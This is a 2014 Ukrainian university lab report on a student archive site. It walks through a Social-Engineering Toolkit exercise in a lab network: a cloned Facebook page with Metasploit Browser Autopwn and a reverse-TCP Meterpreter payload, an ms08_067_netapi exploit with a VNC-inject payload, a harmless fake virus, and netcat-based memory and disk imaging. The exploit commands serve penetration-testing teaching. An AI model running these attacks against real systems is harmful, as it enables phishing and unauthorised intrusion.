Соціал-інжиніринг Toolkit. Create Malicious Weblink, Install Virus, Capture Forensic Images

Інформація про навчальний заклад

ВУЗ:
Національний університет Львівська політехніка
Інститут:
ІКТА
Факультет:
ЗІ
Кафедра:
Кафедра захисту інформації

Інформація про роботу

Рік:
2014
Тип роботи:
Лабораторна робота
Предмет:
Методи та засоби захисту інформації
Варіант:
5

Частина тексту файла (без зображень, графіків і формул):

МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ ”ЛЬВІВСЬКА ПОЛІТЕХНІКА” ІКТА кафедра захисту інформації  ЗВІТ до лабораторної роботи № 5 з курсу «Методи та засоби захисту інформації в комп'ютерних мережах» на тему «Соціал-інжиніринг Toolkit. Create Malicious Weblink, Install Virus, Capture Forensic Images» МЕТА РОБОТИ: Створення шкідливого веб-посилання, віддаленого встановлення вірусу та копіювання образу диску. КОРОТКІ ТЕОРЕТИЧНІ ВІДОМОСТІ: Що таке Social-Engineering Toolkit (SET) The Social-Engineering Toolkit (SET) є пітон керований набір користувальницьких інструментів, які виключно зосереджені на тестування на проникнення людського атакуючого фактора. Його головна мета це збільшення і моделювання соціально-інженерної атаки і дозволяє тестувати і ефективно перевірити, які цільові атаки можуть бути розвинені. Social-Engineering toolkit доступні на backtrack like на backtrack 5, backbox, blackbuntu, Gnacktrack та на інших Linux збірках, які використовуються для тестування на проникнення.  Лабораторні примітки У цій лабораторній ми зробимо наступне: Використуємо набір для створення шкідливих Web-Link Створимо доповнення до VNC сесії Встановимо шкідливі віруси Захоплення судової пам'яті і образу жорсткого диска ХІД РОБОТИ: 1. Запуск Social Engineering ToolKit  Запуск Social Engineering ToolKit Інструкції: cd /pentest/exploits/set ./set Векторний сайт атаки Інструкції: Виберіть 2 3. Виберіть метод Metasploit Browser Attack Інструкції: Виберіть 2 4. Виберіть Web Templates Інструкції: Виберіть 1 5. Встановлення веб атаки на Facebook Інструкції: Виберіть 4 6. Введіть Exploit Інструкції: 24) Metasploit Browser Autopwn (Використовуйте на свій ризик!!!) 7. Встановіть Payload Інструкції: Виберіть 2) Windows Reverse_TCP Meterpreter Використовйте порт 5555 8. Підготовте проломи в роботі сервера Інструкції: Шукайте "--- Done, Found" перед продовженням. 2. Запуск WindowVulnerable01 і запуск Веб Браузера  Запуск Internet Explorer Інструкції: Start --> All Programs --> Internet Explorer Жертва натискає на посилання Інструкції: Помістіть шкідливе Web Link в адресну строку браузера В нашому випадку, http://192.168.1.105:8080 В вашому, візьміть ІР адресу з Частини 4, крок 8. Примітки: Веб браузер буде зломано. 3. Введення машини жертви  Запишіть ІР адресу жертви Інструкції: Запишіть ІР адресу жертви. Знайдіть рядок, що починається з Session ID 1 (Дивись нижче). Створення VNC Session на машині жертви Інструкції: use windows/smb/ms08_067_netapi set PAYLOAD windows/vncinject/bind_tcp set RHOST 192.168.1.109 Примітки: ІР адреса, отримана на попередньому рівні exploit Перегляд машини жертви по VNC Інструкції: Зараз ви маєте VNC підключення до машини жертви. Все добре!!! Захист лабораторної Інструкції №1: Клацніть на Metasploit Courtesy Shell date, введіть дату echo "Your Name" Заповніть рядок "Your Name" вашим іменем. наприклад, echo "John Gray" Заскрініть, PrtScn Вставте в документ Word  Запустіть Internet Explorer Інструкції: Start --> Internet Explorer Скачайте несправжній вірус. Інструкції: Вставте "http://www.computersecuritystudent.com/UNIX/BACKTRACK/lesson6/fake_virus.bat" в адресну строку. Нажміть Ентер Нажміть Зберегти Збережіть несправжній вірус. Інструкції: Йдіть до "C:\tools\Virus Jar" Створіть цю папку якщо її немає. Нажміть Save Запустіть несправжній вірус. Інструкції: Нажміть на кнопку Run Перегляд результатів Інструкції: Ви побачите декілька повідомлень про те, ваша система була скомпрометована. Зверніть увагу, що це всього лише пакетний сценарій, який виводить повідомлення на екран. Це був просто приклад того, що зловмисник може зробити, як тільки зєднається з віддаленим комп'ютером жертви. Натисніть на Black Box і натисніть Enter.. Видаліть fake_virus.bat file Інструкції: Start --> My Computer Йдіть до "C:\tools\Virus Jar" Нажміть праву кнопку мишки на fake_virus.bat Нажміть Delete Send to Recycle Bin? Yes Видаліть fake_virus.bat файл з кошика Інструкції: Йдіть до Recycle Bin (кошик) Нажміть на праву кнопку мишки на fake_virus.bat Нажміть Delete Are you sure want to delete 'fake_virus.bat'? Yes Примітки: Ми повністю видалити цей файл, тому ми повинні видалити файл з попередньої судової лабораторії.. 4. Запуск NetCat  Listener щоб отримати дамп фізичної пам'яті від Helix  Відкрийте консольний термінал Інструкції: Нажміть на консольний термінал Візьміть ІР адресу Інструкції: ifconfig -a Примітки: Як зазначено нижче, наша ІР адреса 192.168.1.105. Запишіть вашу ІР адресу. Запустіть Netcat в BackTrack Інструкції: mkdir -p /FORENSICS/images/1/ cd /FORENSICS/images/1/ nc -l -vvv -p 8888 > WV01_PM_fake_virus.dd Netcat буде очікувати доки Helix відправить образ пам'яті. Ніщо не буде відправлено до завершення наступного розділу. Переходьте до наступного розділу 5. Запустіть Helix для відправки фізичної пам’яті до BackTrack  Відредагуйте конфігурації віртуальної машини Інструкції: Virtual Machine --> Virtual Machine Settings... Настройте Windows для загрузки Helix як образ CD/DVD Інструкціїї:  Виберіть CD/DVD (IDE) Виберіть Use ISO image file Вкажіть де знаходиться Helix iso. Примітки:  У мому прикладі, він збережений за наступною адресою: H:\BOOT ISO\Helix2008R1.iso   Helix екран Інструкції:  Виберіть Accept  Запуск придбання Інструкції:  Нажміть на значок камери. Виберіть "\\PhysicalMemory" з випадаючого вікна Виберіть кнопку NetCat Призначення IP: Забезпечити BackTrack IP-адресу. Отримати ІР адресу BackTrack в Частині 8, Крок 2. В мому випадку це 192.168.1.105. В вашому він буде відрізнятися від даного. Port: 8888 Це порт NetCat на сервері BackTrack. Нажміть Acquire  Зауваження Інструкції:  Нажміть Yes  Helix інформаційний Інструкції:  Ви побачите чорне вікно командного рядка, як показано нижче. Зверніть увагу, він видасть "Copying Physical memory" НЕ переходьте до наступного розділу, поки чорне вікно зникає  6. Перевірте Dump фізичної пам’яті в BackTrack  Перевірте розмір Інструкції: ls -l WV01_PM_fake_virus.dd 7. Запуск NetCat  Listener, щоб отримати образ жорсткого диска від Helix  Запуск Netcat в BackTrack Інструкції: cd /FORENSICS/images/1/ nc -l -vvv -p 8888 > WV01_HD_fake_virus.dd Netcat буде очікувати відправлення образу жорсткого диска від Helix. Ніщо не буде відправлено до завершення в наступному розділі.   8. Використання Helix для відправлення образу жорсткого диску в BackTrack  Використання придбання Інструкції: Нажміть на значок камери. Виберіть "C:\ (Logical drive)" з випливаючого меню Виберіть кнопку NetCat Призначення IP: Надання BackTrack IP адреси. Отримати ІР адресу BackTrack IP в Частині 8, Крок 2. У нашому прикладі це 192.168.1.105. В вашому він буде відрізнятися. Port: 8888 Це порт Listening NetCat на BackTrack сервері. Нажміть Acquire  Зауваження Інструкції:  Нажміть Yes  Helix інформаційний Інструкції:  Ви побачите чорне вікно командного рядка, як показано нижче. Зверніть увагу, він видасть "Copying \\.\C to CONOUT$..." Це копіювання 8GB може зайняти близько 30 хвилин. Не Переходьте до наступної частини доки чорне вікно не зникне 9. Перевірка образу жорсткого диска в BackTrack  Перевірка розміру образу Інструкції: ls -l WV01* date echo "Your Name" Запомніть рядок "Your Name" вашим актуальним іменем. наприклад, echo "John Gray" Захист лабораторної. Інструкції #2: Заскрініть Вставте в Word документ    ВИСНОВОК: Отримавши віддалений доступ до комп'ютера жертви за допомогою шкідливого веб-посилання завантажив вірус на ПК жертви та отримав образи дисків.
Антиботан аватар за замовчуванням

25.05.2014 09:05-

Коментарі

Ви не можете залишити коментар. Для цього, будь ласка, увійдіть або зареєструйтесь.

Ділись своїми роботами та отримуй миттєві бонуси!

Маєш корисні навчальні матеріали, які припадають пилом на твоєму комп'ютері? Розрахункові, лабораторні, практичні чи контрольні роботи — завантажуй їх прямо зараз і одразу отримуй бали на свій рахунок! Заархівуй всі файли в один .zip (до 100 МБ) або завантажуй кожен файл окремо. Внесок у спільноту – це легкий спосіб допомогти іншим та отримати додаткові можливості на сайті. Твої старі роботи можуть приносити тобі нові нагороди!
Нічого не вибрано
0%

Оголошення від адміністратора

Антиботан аватар за замовчуванням

Подякувати Студентському архіву довільною сумою

Admin

26.02.2023 12:38

Дякуємо, що користуєтесь нашим архівом!